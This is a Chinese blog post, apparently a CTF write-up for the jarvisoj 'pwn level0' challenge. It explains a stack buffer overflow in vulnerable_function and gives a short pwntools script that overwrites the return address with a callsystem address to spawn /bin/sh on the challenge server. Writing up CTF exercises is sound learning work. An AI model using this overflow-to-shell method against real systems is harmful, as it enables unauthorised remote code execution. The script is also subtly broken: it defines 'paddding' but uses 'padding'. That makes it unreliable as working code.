jarvisoj pwn level0

Joey_l

于 2019-07-31 23:02:09 发布

阅读量303

点赞数

分类专栏： pwn

本文链接：https://blog.csdn.net/Joey_l/article/details/97974557

版权

pwn 专栏收录该内容

3 篇文章 0 订阅

订阅专栏

前几天做了几道pwn题，记录一下

https://www.jarvisoj.com/challenges

拿到程序后先file可知为64位程序和动态链接

file level0

然后checksec检查保护机制

checksec level0

将程序拖到ida中，F5反汇编，得到伪c代码

双击vulnerable_function()函数

可以看到read函数读0x200进入buf中，而buf空间只有0x80

shift+f12可查看到有/bin/sh，并且在400596处还有callsystem函数

思路：将vulnerable_function()函数的返回地址覆盖为system('/bin/sh')的地址

level0.py如下：

from pwn import *
sh=remote('pwn2.jarvisoj.com',9881)
paddding='a'*0x88
callsystem=0x400596
payload=padding+p64(callsystem)
sh.send(payload)
sh.interactive()
sh.close()

运行level0.py

python level0.py

Joey_l

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
jarvisoj pwn level0

前几天做了几道pwn题，记录一下https://www.jarvisoj.com/challenges拿到程序后先file可知为64位程序和动态链接file level0然后checksec检查保护机制checksec level0将程序拖到ida中，F5反汇编，得到伪c代码双击vulnerable_function()函数可以看到read函数读0x200进入...
复制链接

扫一扫

专栏目录